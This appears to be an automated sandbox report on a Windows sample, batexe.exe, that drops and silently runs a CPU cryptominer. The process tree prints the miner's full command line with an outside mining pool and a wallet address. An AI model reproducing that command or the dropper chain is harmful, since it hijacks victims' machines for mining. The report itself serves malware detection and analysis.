73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
306s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
20/02/2024, 13:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1252	b2e.exe
3260	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3260	cpuminer-sse2.exe
3260	cpuminer-sse2.exe
3260	cpuminer-sse2.exe
3260	cpuminer-sse2.exe
3260	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4624-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4624 wrote to memory of 1252	4624	batexe.exe	74
PID 4624 wrote to memory of 1252	4624	batexe.exe	74
PID 4624 wrote to memory of 1252	4624	batexe.exe	74
PID 1252 wrote to memory of 544	1252	b2e.exe	75
PID 1252 wrote to memory of 544	1252	b2e.exe	75
PID 1252 wrote to memory of 544	1252	b2e.exe	75
PID 544 wrote to memory of 3260	544	cmd.exe	78
PID 544 wrote to memory of 3260	544	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4624
- C:\Users\Admin\AppData\Local\Temp\22D5.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\22D5.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\22D5.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\29E9.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\22D5.tmp\b2e.exe

Filesize
2.2MB

MD5
797c73207485bd68d1cf351dd92a049e

SHA1
3015470c80f9d8212734666ffaa7522593efcb81

SHA256
d8972f99e16619eb6b7658263c00766f8ead937d9f45d1d95aa35d0d7e085263

SHA512
d33677452292f1fb534d67dfc62fbd9b1325c9bf2d00d48e9f534c6443098486dad629ce633e0159fc7d8eb9685a01725265c483db9ea9db19a15679a3ee1f31

Download Submit
C:\Users\Admin\AppData\Local\Temp\22D5.tmp\b2e.exe

Filesize
2.2MB

MD5
8ba8eeedda240f63d8f5bd70985ad1c2

SHA1
8361c983acb4c82283a935e70f04aafeb53f6f71

SHA256
0af8fc3ae4ead4b59e5cbd129f8b7e4f2c863bf8e0a3da4a16a3a63d18bfd1ac

SHA512
217802ab31b76b0132ad6594b4c1cec1126f81ef9c7536eedab7aae4775d8c4650fc5595455bb690eee290bd0408fa935f434a0899b7cac7fb7e69e978228c89

Download Submit
C:\Users\Admin\AppData\Local\Temp\29E9.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
352KB

MD5
2cab9500478740524a4402e0e7a3b6f9

SHA1
60c3cee067a3b473d66995c3e7d78044499c9fb3

SHA256
af89b079631e002999be158b6a552bc979273790aa358e3667856bcb5ab78e24

SHA512
654146641c52ddf179f62d3206825d67b54bcca199010c1b33433c60ada6b1e160b95af61e29c5518535c398cc5fe62f65a4e4332f336d8a2c244547d5d6289c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
148KB

MD5
3ee380413924495e90f4c540edc7a035

SHA1
c7399aeb22ece788b0c6ba5ab8a94ba47ae2da9f

SHA256
445c6a9924114163b0eca3ba77bd127618d9df56fa42a30e19229619eb9633ef

SHA512
e795336df6a6498d356a8356c51031236723126707b1408fc727d0bc18e81f6a775c97b9d1cfb02d6caa182dcc96b86b0291e077db709b9a6f5da4b622a79c2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
124KB

MD5
8f6bfec7b0eb2e914305a932f3de272a

SHA1
c149258b93b6573defa3cb3a1edc83bdd8c376ca

SHA256
25c0950d1fcd7e546024306f62ceaee1ca45a68c9ebd2a63285f17f96f936ba7

SHA512
70b483c73f8ae0cc126379179d625128f4d51b95e409504e03dd91946dbb4e94d2aab460e6c8750b49ea2f650ccfc922f018b7d8f5e81ac607ca209f1f581800

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
179KB

MD5
70bae1cc4399e3d317c53f7037d03b50

SHA1
f2732f8c25e6b2627103a2cb79e114ceab875d92

SHA256
ad1708251ef8515ad3da4358ad8326503b7d681934e2d5231cf5ea73f66a86d3

SHA512
8e86b08b79299606404cb4647ee06c2623f6160315066b3804ebfb923080f8838cddd1f6d26c7e56014357803d285a9ed181a1e8fe80d69ed64e5df2bbc2a845

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
164KB

MD5
39dae8245b1f33cae22b8d3eaf7e51f1

SHA1
15eca346e61cb5138748002708161746e0209327

SHA256
6c2bdb993364a69c2c18775e93dc194b58b528704485038f8e6de95c9120a5d1

SHA512
24b29acebd9cf6c3dca51fb50a0beed36fe215aea6044d6fb7dab8462d4949863208f6e8035b585eaa69150e4acde80b5f1cf90dea01a064ee6b6f8e660e136b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
256KB

MD5
eca0c37eee65c31b869788d5d0bf00cd

SHA1
33a5c0cd2f0a7296a5c0169699ed8e065b57e5e8

SHA256
1d2b7bd4ddd99d627d5111252baadf028dc9910cf414892867502e5951de962e

SHA512
5f302da7772fca0a6d03ffd8732850f526acf5fcc33e189d2d906a33101454d970d5cca2f829a006d15c4a857341d72c7876cb2e7af84ada4f158695aba5a4dc

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
228KB

MD5
6472fed9d86cc9d3254d45b2109f31a0

SHA1
be447cbe8b4f5f094c985d4cd64005140355bb65

SHA256
e26f68c4a5a5e13c1a1e1d209580c9e380918deeb6735213a4c5c8ff946da739

SHA512
1f504e49309429ba8dba83cbda8b9b8c3e6c6540d029c018b8aedb3b3cf156391a99005ba1a3b11b335992efa99e62e6dcbd1cc58a3e4fb2b4f79b253c4e7d6f

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
240KB

MD5
a3a41cbf293b7e74deb6d009e33c00bc

SHA1
008c87feaaa93bb89ef2034beafc78ae520c1dd1

SHA256
b2ad464a03b0e7f9cf656f6f72e764a426b45546147259896b0a2878b258f870

SHA512
3811bbb32d3aad69b8180d14041ac9ba489473d1b6a8e57b628c6776b237a466b96aeaebaa9fe5ebf0a662c5a4c6ee4b2d1b42877c26fc1977c906e1a4c769fa

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
150KB

MD5
bf12f8105ad21d1a27d68cdd4f5b5530

SHA1
88b7501bb6db9be3415670896a965daa665a6acb

SHA256
318865cd5e57ce0482ad8db72c2ac76db7fa0ac7637ff294c60e11cc1385752d

SHA512
b4bb519444108b58c0bdf60a49a1bb083ee988499fda1ef2a5cbb2570da1e69b966f37a51e96aacb8a4bd60847028dcd14221da72a0359ae6218440c32ae4226

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
214KB

MD5
fc505035b0030c9856b2a6222105a7e6

SHA1
91c573fe617e9fdb1c26a79d90c73c99964a5f4c

SHA256
4877dbad7c28dbd66b5eaeefdb23286069bcef7e37779f659806dcad89d47e4e

SHA512
783a50773574713a0e481ab9c3fc1534a5b673674ad000d2e6b4c438f31ba69ec59b223ee7c0d25592371fb5936e28a21d0de896955d32d1153f48319d929528

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
140KB

MD5
15d3c01ed26e6676dcca9b77bfbff9cd

SHA1
075249e36ee966b34124a96290307d794af98a3e

SHA256
d85409a3da1ec222aac637783b1936487766e463481d567e331f7437e352c9df

SHA512
875685cd19930f96e19e5ce045445b6dfa6863e8c7183cfbedfae8a056bbf5c6b2c8a4bfc0b24eddf7baf2b271ce4d0f5a961d11b5c6bba20b6e189913f701f4

Download Submit
memory/1252-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1252-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3260-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-42-0x0000000050AE0000-0x0000000050B78000-memory.dmp

Filesize
608KB

Download
memory/3260-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3260-44-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/3260-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3260-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3260-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4624-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download